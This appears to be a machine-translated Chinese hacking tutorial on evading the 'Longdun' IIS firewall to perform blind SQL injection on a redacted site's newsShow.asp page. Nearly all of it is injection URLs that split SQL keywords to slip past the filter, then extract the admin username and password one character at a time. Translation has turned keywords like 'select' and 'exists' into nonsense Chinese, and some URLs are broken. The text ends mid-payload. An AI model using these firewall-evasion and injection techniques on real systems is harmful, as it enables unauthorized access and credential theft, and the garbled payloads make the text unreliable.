小方法“绕过龙盾防火墙”

　　今天的技术主要是结合网上的和自己的想法思路绕过”龙盾IIS防火墙“其他防火墙没试过

　　的http://

　　***. COM / newsShow.asp?ArticleID = 120 1 = 1

　　http:// ***. COM / newsShow.asp?ArticleID = 120和1 = 2

　　一直提示

　　http:// ***. COM / newsShow.asp?ArticleID =(120)%20and%20(%201 = 1%20)返回正常

　　http:// ***. COM / newsShow.asp?ArticleID =( 120)%20and%20(= 2%20%201)

　　前%%派(塞莱%%CT *

　　和EX%%派(塞莱%%CT管理员用户名)

　　呵呵返回成功，存在的用户名表

　　http:// ***. COM / newsShow.asp?ArticleID =(120)和前%%派(塞莱%%%的CT密码

　　1 整理

　　?

　　先看看管理员用户名有几位吧～

　　http:// ***. COM / newsShow.asp?ArticleID =(120)和EX%%派(塞莱%%，CT从管理员那里LEN(用户名的用户名)= 5)

　　一切正常呵呵，不错的RP挺好～

　　http:// ***. COM / newsShow.asp?ArticleID =(120)和前%%派(塞莱%%，CT从管理员那里ASC(ID中期(用户名，1))= 120)

　　http:// ***. COM / newsShow.asp?ArticleID =(120)和ex%%派(塞莱%%，CT编号从管理ASC(MID(用户名，2))= 50)

　　http:// ***. COM / newsShow.asp?ArticleID =(120)和EX%%派(塞莱%%，CT编号从管理ASC(MID(用户名，3))= 99)

　　http:// ***. COM / newsShow.asp? )

　　http:// ***. COM / newsShow.asp?ArticleID =(120)和ex%%派(塞莱%%，CT ID ASC(MID(用户名，5))= 109)从admin

　　出来了，

　　和EX%%派(塞莱%%CT密码管理LEN(密码)= 8)，密码一共有8位数

　　http:// ***. COM / newsShow.asp?ArticleID =(120)和ex%%派(塞莱%%，CT ID从管理ASC(MID(密码，1))= 98)

　　呻/***. COM / newsShow.asp?ArticleID =(120)和ex%%派(塞莱%%，CT从管理的id ASC(MID(密码，2))= 105

　　)http:// ** *. COM / newsShow.asp?ArticleID =(120)和ex%%派(塞莱%%，CT ID管理ASC(MID(密码，3))= 111)

　　http:// ***. COM / newsShow.asp?ArticleID =(120)和ex%%派(塞莱%%CT ID从管理ASC(MID(密码，4))= 115)

　　http:// ***. COM / newsShow。 ASP?ArticleID =(120)和前%%派(塞莱管理ASC(MID(密码，5))= 108%%CT ID)

　　http:// ***. COM / newsShow.asp?ArticleID =(120)及前%%派(塞莱%%CT ID从管理ASC(MID(密码，6))= 111)

　　http:// ***. COM / newsShow.asp?ArticleID =(120 )和EX%%派(塞莱%%CT ID管理ASC(密码，MID(7))= 97)

　　http:// ***. COM / newsShow.asp?ArticleID =(120)和前%%派(塞莱%%，CT ID从管理员那里